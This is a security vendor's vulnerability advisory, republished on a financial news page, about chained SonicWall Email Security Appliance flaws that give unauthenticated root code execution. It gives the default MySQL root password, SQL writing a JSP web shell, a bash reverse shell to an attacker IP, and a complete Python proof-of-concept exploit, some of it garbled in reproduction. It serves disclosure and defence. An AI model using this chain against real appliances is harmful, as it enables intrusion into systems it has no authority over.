Log in
E-mail
Password
Remember
Forgot password ?
Become a member for free
Sign up
Sign up
New member
Sign up for FREE
New customer
Discover our services
Settings
Settings
Dynamic quotes 
OFFON

SECUREWORKS CORP.

(SCWX)
  Report
SummaryQuotesChartsNewsRatingsCalendarCompanyFinancialsConsensusRevisions 
SummaryMost relevantAll NewsAnalyst Reco.Other languagesPress ReleasesOfficial PublicationsSector news

SecureWorks : SonicWall Email Security Appliance Vulnerabilities Could Allow Remote Code Execution

04/20/2021 | 11:26am EDT
SonicWall Email Security Appliance Vulnerabilities Could Allow Remote Code Execution By leveraging a weak password and the ability to forward ports, an unauthenticated attacker could remotely execute code on systems running SonicWall Email Security Appliance versions through 10.0.2.Tuesday, April 20, 2021By: Counter Threat Unit Research Team
Summary

A Secureworks® assessment of a customer's environment led to the discovery of two vulnerabilities in the SonicWall Email Security Appliance: a weak default root MySQL password (CVE-2019-7488) and a flaw that allows a restricted SSH (Secure Shell) user without a password to forward ports (CVE-2019-7489). When combined, these vulnerabilities led to unauthenticated remote code execution and a full system compromise.

Technical details

Analysis of the customer's network revealed a SonicWall Email Security Appliance (see Figure 1).


Figure 1. SonicWall Email Security Appliance login. (Source: Secureworks)

Initial scans showed that SSH was available on the server. An attempt to authenticate to the SSH service generated a prompt to login as 'snwlcli user':

$ ssh root@192.168.56.77
For CLI access you must login as snwlcli user.
root@192.168.56.77's password:

Attempting to authenticate to the SSH session using the 'snwlcli' user generated an additional login prompt:

$ ssh snwlcli@192.168.56.77
For CLI access you must login as snwlcli user.
Terminal type not supported; setting to ansi
Login:

To better understand the 'snwlcli' user and the authentication process, the Secureworks analyst downloaded the same version of the virtual appliance from the SonicWall website. They then added the virtual hard drive (VMDK file) to an existing Kali Linux virtual machine to view the files contained on the hard drive and mount additional .img files that were located there.

The files appeared to be part of a fairly standard Linux image. The '/etc/passwd' and '/etc/shadow' files indicated that the 'snwlcli' user lacks an SSH password and has a non-standard shell that is actually a script that calls a binary:

# cat passwd shadow | grep snwlcli
snwlcli:x:1001:1001::/home/default:/opt/vsa/bin/snwlcli.sh
snwlcli::12605:0:::::

Although missing libraries and other components prevented the binary from being executed from the mounted image, analysis revealed that 'snwlcli' was a valid SSH user without a password and that the binary was performing the authentication. This realization led to questions about whether other SSH features such as SSH forwarding were available.

Knowing that MySQL was installed, the analyst attempted to forward a local port from their system (as the 'attacker') to the remote MySQL port on the customer's ('victim's') SonicWall Email Security Appliance and was successful:

$ ssh -L13306:127.0.0.1:3306 snwlcli@192.168.56.77
For CLI access you must login as snwlcli user.
Terminal type not supported; setting to ansi
Login:

The 'attacker' system was now connected to the MySQL server, as the port forwarding made the system appear local. This connection included access to the MySQL database as a low-privileged anonymous user.

$ mysql -h 127.0.0.1 -P 13306
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 5618
Server version: 5.5.52-MariaDB MariaDB Server

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql> select @@hostname;
+------------------+
| @@hostname       |
+------------------+
| snwl.example.com |
+------------------+
1 row in set (0.00 sec)

The analyst located the MySQL user table (user.MYD) on the downloaded and mounted appliance virtual hard drive and dumped the hashes via the strings command. These hashes were then submitted to a purpose-built password cracking server to obtain the root password:

# strings user.MYD
localhost
esuser*D68FF9798076AF80F5261ADC1E825E7652D41678
root*BD341544E67ED19C9E7E6CD9758831ABFC2601D1

The analyst then used the MySQL root credentials to write a simple JSP web shell to one of the web directories:

MariaDB [(none)]> select '' into outfile '/opt/tomcat/webapps/SearchEngineRMIService/sw.jsp'

The JSP web shell provided blind command execution. The analyst was unable to directly execute any standard reverse shell commands but was eventually able to obtain a reverse shell by writing a second script to disk using MySQL:

MariaDB [(none)]> select '/bin/bash -i >& /dev/tcp/192.168.56.1/80 0>&1' into outfile '/opt/tomcat/temp/r1.sh';

The analyst then executed this script using the original command shell:

$ curl http://192.168.56.77/SearchEngineRMIService/sw.jsp?cmd=sh+/opt/tomcat/temp/r1.sh

The resulting reverse shell provided full root access to the appliance:

$ ncat -lvp 80
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 192.168.56.77.
Ncat: Connection from 192.168.56.77:49368.
bash-4.1# id
id
uid=0(root) gid=0(root)

Proof-of-concept exploit

The following code is the full proof-of-concept exploit:

#!/usr/bin/env python3
### This script automates unauthenticated remote code execution on SonicWall Email Security Appliances version 10.0.2 using CVE-2019-7488 and CVE-2019-7499
### You must listen with a netcat listener, and the script will do the rest. It may take a couple seconds to run.
### Vulnerability discovered and POC developed by Nevada Romsdahl
import sys
import subprocess
import requests
import time
import mysql.connector

def forward_ports(target):
    print('[+] Forwarding MySQL and HTTP ports via SSH, ignore the login prompt that will appear')
    subprocess.Popen(f'ssh -L13306:127.0.0.1:3306 snwlcli@{target}', shell=True)
    time.sleep(3)
    subprocess.Popen(f'ssh -L13080:127.0.0.1:80 snwlcli@{target}', shell=True)
    time.sleep(3)

def write_shells(lhost, lport, fname):
    mydb = mysql.connector.connect(
        host='127.0.0.1',
        user='root',
        password='sonic@11',
        port=13306
    )
    mycursor = mydb.cursor()
    print('[+] Writing command shell to the web directory')
    mycursor.execute(
        f'select '' into outfile '/opt/tomcat/webapps/SearchEngineRMIService/{fname}.jsp''
    )
    print('[+] Writing reverse shell to the temp directory')
    mycursor.execute(
        f'select '/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1' into outfile '/opt/tomcat/temp/{fname}.sh';')

def execute_shell(fname):
       print('[+] Executing the reverse shell')
       command_url = 
f'http://127.0.0.1:13080/SearchEngineRMIService/{fname}.jsp?cmd=sh+/opt/tomcat/temp/{fname}.sh'
    r = requests.get(url=command_url)
    print('n[+] Check your listener, you should have a shell.n')

def main():
    if len(sys.argv) != 4:
        print(' ')
        print(f'Usage: {sys.argv[0]} ')
        print(f'Example: {sys.argv[0]} 192.168.2.3 192.168.2.1 4444')
        print('Open a netcat listener before running this script')
        print(' ')
        sys.exit(1)
target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] fname = time.strftime('%Y%m%d-%H%M%S')
forward_ports(target) write_shells(lhost, lport, fname) execute_shell(fname)

if __name__ == '__main__':
    main()

Conclusion

The discovery of these issues revealed a combination of vulnerabilities that attackers could exploit to execute remote code on vulnerable systems. After Secureworks privately disclosed the issues to the vendor, SonicWall addressed them in Email Security Appliance 10.0.3. Organizations running earlier versions should upgrade as appropriate in their environments.

Disclaimer

SecureWorks Corp. published this content on 20 April 2021 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 20 April 2021 15:25:04 UTC.


© Publicnow 2021
All news about SECUREWORKS CORP.
11:31aSECUREWORKS  : The Music of Security Operations Orchestration
PU
05/04FROM DEFENSE-IN-DEPTH TO DEFENSE-IN- : Gain Holistic Security with Open XDR
PU
04/27SECUREWORKS  : The Importance of a Strong Security Vulnerability Management Syst..
PU
04/26INSIDER TRENDS : SecureWorks Insider Disposes of Shares for Tax Slowing 90-Day B..
MT
04/26DELL TECHNOLOGIES  : Safeguards IT Environments with New Security Service Powere..
PR
04/22SECUREWORKS  : Post-Intrusion Ransomware Incident Response
PU
04/20INSIDER TRENDS : Insider at SecureWorks Disposes of Shares for Tax Slowing 90-Da..
MT
04/20INSIDER TRENDS : SecureWorks Insider Makes Shares Sale for Tax Slowing 90-Day Bu..
MT
04/20INSIDER TRENDS : SecureWorks Insider Makes Tax Sale Interrupting 90-Day Buy Tren..
MT
04/20SECUREWORKS  : SonicWall Email Security Appliance Vulnerabilities Could Allow Re..
PU
More news
Financials (USD)
Sales 2022 541 M - -
Net income 2022 -62,6 M - -
Net cash 2022 221 M - -
P/E ratio 2022 -18,1x
Yield 2022 -
Capitalization 1 102 M 1 102 M -
EV / Sales 2022 1,63x
EV / Sales 2023 1,55x
Nbr of Employees 2 696
Free-Float 9,59%
Chart SECUREWORKS CORP.
Duration : Period :
SecureWorks Corp. Technical Analysis Chart | MarketScreener
Full-screen chart
Technical analysis trends SECUREWORKS CORP.
Short TermMid-TermLong Term
TrendsBearishBullishBullish
Income Statement Evolution
Consensus
Sell
Buy
Mean consensus UNDERPERFORM
Number of Analysts 8
Average target price 13,93 $
Last Close Price 13,27 $
Spread / Highest target 20,6%
Spread / Average Target 4,96%
Spread / Lowest Target -13,3%
EPS Revisions
Managers and Directors
NameTitle
Michael R. Cote Chief Executive Officer & Director
Paul M. Parrish Chief Financial Officer & Senior Vice President
Michael Saul Dell Non-Executive Chairman
Jon R. Ramsey Chief Technology Officer
Kevin Hanes Chief Operating Officer
Sector and Competitors
1st jan.Capitalization (M$)
SECUREWORKS CORP.-6.68%1 102
ACCENTURE PLC10.84%184 033
TATA CONSULTANCY SERVICES8.14%155 110
INTERNATIONAL BUSINESS MACHINES CORPORATION15.78%129 757
AUTOMATIC DATA PROCESSING, INC.10.09%82 406
INFOSYS LIMITED6.82%77 141